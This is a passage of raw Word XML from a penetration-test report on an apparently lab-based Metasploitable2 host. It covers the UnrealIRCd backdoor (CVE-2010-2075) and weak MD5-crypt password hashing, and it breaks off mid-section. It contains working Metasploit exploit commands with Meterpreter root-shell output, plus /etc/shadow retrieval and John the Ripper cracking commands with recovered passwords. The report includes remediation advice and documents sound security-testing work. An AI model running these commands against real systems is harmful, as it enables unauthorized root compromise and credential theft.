              </w:rPr>
              <w:t xml:space="preserve">CVE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2010-2075</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical (10.0 / 10.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Port/Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">6667/TCP, 6697/TCP (IRC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Target Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">172.20.10.3 (Metasploitable2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploit Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The IRC service on the target was running a trojaned distribution of UnrealIRCd 3.2.8.1. As with the vsftpd finding, the official source archive for this version was replaced by an attacker-modified copy containing a backdoor. Sending a specific command string to the IRC daemon after registering a user causes it to execute arbitrary shell commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search unrealircd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">use exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">show options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">set RHOSTS 172.20.10.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">set LHOST 172.20.10.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence / Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The module registered a test IRC user, confirmed the backdoor was present, and sent the trigger command. A Meterpreter session was established, and privilege checks confirmed root-level access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] 172.20.10.3:6667 - The target appears to be vulnerable. UnrealIRCd detected after registration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">[*] Meterpreter session 1 opened (172.20.10.4:4444 -&gt; 172.20.10.3:53403)</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shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">uid=0(root)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4572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29025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6.3: Metasploit console output confirming the UnrealIRCd backdoor was triggered and root access (uid=0) was obtained.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete unauthenticated remote compromise as root, identical in severity to the two findings above. Three independent attack paths on a single host each individually provide full system control, indicating the target's overall security posture is critically deficient.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace UnrealIRCd with an official, checksum-verified build.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify the integrity of all third-party software before deployment using published checksums or signatures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict or disable IRC services entirely if not required for business operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement network segmentation so that compromise of one service does not expose the entire host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.4 Weak Password Hashing — Offline Credential Cracking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F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Weak Credential Storage / CWE-916 (Use of Password Hash With Insufficient Computational Effort)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High (7.5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">/etc/shadow, obtained via the vsftpd and Samba findings above (Sections 6.1, 6.2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Tool Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">John the Ripper (dictionary attack, rockyou.txt wordlist)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">During post-exploitation of the vsftpd and Samba findings, root access was used to retrieve /etc/shadow, which stores the password hashes for every account on the system. Inspection of the hash format revealed the use of MD5-crypt ($1$ prefix) — a hashing algorithm considered cryptographically weak and computationally inexpensive to brute-force by modern standards, superseded by SHA-512 ($6$) or bcrypt in current systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To demonstrate the real-world impact of this weakness, the retrieved hashes were merged with their corresponding usernames using the unshadow utility and subjected to an offline dictionary attack using John the Ripper against the rockyou.txt wordlist, a widely available list of real-world leaked passwords.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">unshadow passwd.txt shadow.txt &gt; combined.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">john --wordlist=/usr/share/wordlists/rockyou.txt combined.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">john --show combined.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence / Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Within under a minute of runtime, John the Ripper recovered plaintext passwords for 3 of the 7 accounts that had valid password hashes set — a 43% success rate using only a public wordlist and no custom tuning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sys:batman:3:3:sys:/dev:/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">klog:123456789:103:104::/home/klog:/bin/false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">service:service:1002:1002:,,,:/home/service:/bin/bash</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3 password hashes cracked, 4 left</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
